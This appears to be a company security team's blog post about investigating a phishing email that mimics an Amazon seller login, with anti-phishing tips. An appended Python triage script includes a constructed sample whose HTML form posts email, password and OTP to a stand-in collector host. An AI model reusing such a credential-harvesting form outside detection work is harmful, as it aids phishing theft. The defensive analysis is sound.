10 minutes in the life of a security engineer

Throughout the history of the internet we have been taught to use buttons, hyperlinks and a million other UI elements, which, quite frankly, make our lives so much easier. The other group of people (besides web developers) who like to hide things behind hyperlinks and buttons for the sake of convenience is hackers. They know perfectly well how conditioned our brains are to interact with these elements (i.e. click them), so they abuse that reflex to do all sorts of nasty things: steal your credentials, install malware, and so on.

In the ABOUT YOU information security team we hear one question several times a day: “Is this email legitimate / safe?”. This article shows how we answer it.

At ABOUT YOU, we (the information security team) receive reports of phishing emails from colleagues every day. It is our job to investigate these reports and work out whether they pose a real threat to the company.

In this article, I would like to show how we investigated one real phishing email that landed in a colleague’s inbox.

It all began with a phishy-looking email written in German.

Roughly translated, it says: “Friendly seller, there was a problem setting up automatic payments on Amazon… If you do not correct the errors within the next 48 hours, your account will be suspended. Thank you for selling on Amazon.”

If you open the attachment, all you see is a login page that looks identical to the real Amazon one.

There is one catch though: if you click “Anmelden” (German for “sign in”), your email address, password and OTP are sent to a server controlled by the attacker. The screenshot below shows that request, intercepted by one of the tools we use to investigate emails like this:

Now you can also see that this is clearly a malicious email whose purpose is to gain access to your Amazon account.

This is just a simple example of a phishing email. We have seen much more sophisticated cases, including malicious Word attachments, business email compromise and fake sign-in pages for various popular websites.

How can you protect yourself?

A short answer to this question:

don’t click shit

And the long answer can fill in another Medium story :)

However, here are some tips on how to identify phishing emails:

  1. Did you expect this email? If the answer is “no”, your spidey-sense should start tingling.
  2. Do you know the sender? If not, the bells should ring louder.
  3. Does the email contain links or attachments? If it does, don’t open them yet; take a moment to think about them.
  4. Does the email have a tone of urgency, like “do this immediately, otherwise X will happen”? If the answer is “yes”, you are probably looking at a phishing email.
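Applying the checklist to an email like the one investigated above, as an added example that is not part of the original post or of the ABOUT YOU team’s tooling: a small Python triage script that checks the sender domain, looks for urgent wording, lists attachments and, for an HTML attachment like the fake Amazon login page, extracts every form action and flags any that would send the entered credentials to a host outside the brand’s own domains. The sample message, the trusted-domain list and the urgency word list are constructed for the example.

```python
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse
TRUSTED_DOMAINS = ("amazon.de", "amazon.com")  # the imitated brand's own domains (assumption)
URGENCY_WORDS = ("48 stunden", "48 hours", "gesperrt", "suspended", "sofort", "immediately")
# Constructed sample: urgent wording plus an HTML "Anmelden" form that posts credentials elsewhere.
SAMPLE_EML = """\
From: "Amazon Seller Support" <support@example-mailer.test>
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Wenn Sie die Fehler nicht innerhalb von 48 Stunden korrigieren, wird Ihr Konto gesperrt.
--b1
Content-Type: text/html
Content-Disposition: attachment; filename="Anmelden.html"

<form method="post" action="https://login-collector.invalid/submit">
<input name="email"><input name="password"><input name="otp"><button>Anmelden</button></form>
--b1--
"""
class FormActions(HTMLParser):
    """Collect the action attribute of every <form> in an HTML document."""
    def __init__(self, html_text):
        super().__init__()
        self.actions = []
        self.feed(html_text)
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions += [v for k, v in attrs if k == "action" and v]

def is_trusted(host, trusted):
    return any(host == d or host.endswith("." + d) for d in trusted)

def triage(raw_eml, trusted=TRUSTED_DOMAINS):
    msg = message_from_string(raw_eml, policy=policy.default)
    sender_domain = parseaddr(str(msg["From"]))[1].rpartition("@")[2].lower()
    findings = [] if is_trusted(sender_domain, trusted) else [("unknown-sender", sender_domain)]
    body = msg.get_body(preferencelist=("plain", "html"))  # tip 4: tone of urgency
    findings += [("urgency", w) for w in URGENCY_WORDS if body and w in body.get_content().lower()]
    for part in msg.iter_attachments():  # tip 3: attachments, and where a login form sends data
        findings.append(("attachment", part.get_filename() or "<unnamed>"))
        if part.get_content_type() == "text/html":
            for action in FormActions(part.get_content()).actions:
                host = (urlparse(action).hostname or "").lower()
                if not is_trusted(host, trusted):
                    findings.append(("form-posts-elsewhere", host or action))
    return findings
```

Running `triage(SAMPLE_EML)` reports the unknown sender domain, the urgent wording, the attachment and the form posting to login-collector.invalid; a relative form action is reported as-is, since a page opened from disk would post it somewhere other than the brand.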

If you want to dig deeper into the topic, I can totally recommend the following GitHub repository:

https://github.com/sapran/dontclickshit/blob/master/README_EN.md

Stay safe and don’t let the hackers fool you.